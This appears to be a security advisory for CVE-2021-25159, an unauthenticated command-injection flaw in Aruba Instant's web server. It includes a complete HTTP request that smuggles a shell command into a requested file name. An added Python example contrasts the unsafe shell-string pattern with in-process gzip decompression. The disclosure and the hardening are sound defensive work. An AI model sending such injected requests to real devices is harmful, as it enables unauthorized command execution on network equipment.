An unauthenticated attacker can execute arbitrary commands on Aruba Instant devices. To exploit this vulnerability, the attacker has to put a file with a command in the file name in the HTTP directory.
All the files in the webserver directory are compressed with gzip. If a client requests a file without accepting gzip, the webserver decompresses the file for the client by executing gunzip.
The filename parameter is unsanitized and can be used to execute arbitrary commands. An attacker can create a file with CVE-2021-25159 and execute commands.
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';%20ps%20#aaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: IP:4343
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9
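The following is an added example, not code from the advisory or from the vendor, that contrasts the pattern described above with an in-process alternative. The function names, the `/www` path and the single-quoted `gunzip -c` command line are assumptions inferred from the request above; the command line the firmware actually builds is not given on the page.

```python
import gzip
import os
import tempfile
from urllib.parse import unquote


def shell_command_for(webroot, request_path):
    """Assumed vulnerable pattern: the file name is pasted into a shell string.
    The string is returned for inspection only; nothing here executes it."""
    name = unquote(request_path).lstrip("/")
    return "gunzip -c '%s/%s.gz'" % (webroot, name)


def read_decompressed(webroot, request_path):
    """Hardened form: decompress in-process, so the name is only ever a path."""
    name = unquote(request_path).lstrip("/")
    # Accept a single path component only; no traversal, no NUL bytes.
    if not name or name in (".", "..") or "/" in name or "\x00" in name:
        raise ValueError("rejected file name")
    with gzip.open(os.path.join(webroot, name + ".gz"), "rb") as fh:
        return fh.read()


def demo():
    # Constructed request path, shortened from the one in the advisory.
    request_path = "/AAAA';%20ps%20#aaaa"
    with tempfile.TemporaryDirectory() as webroot:
        # Constructed file whose name carries shell syntax.
        hostile = os.path.join(webroot, "AAAA'; ps #aaaa.gz")
        with gzip.open(hostile, "wb") as fh:
            fh.write(b"<html>index</html>")
        # The shell string ends its quote early; the in-process read
        # treats the same name as plain bytes and returns the content.
        return (shell_command_for("/www", request_path),
                read_decompressed(webroot, request_path))


if __name__ == "__main__":
    command, body = demo()
    print(command)
    print(body)
```

In the returned shell string the quote closes after `AAAA`, so everything up to the `#` would be parsed as a second command, while `read_decompressed` opens the same name without any shell involved.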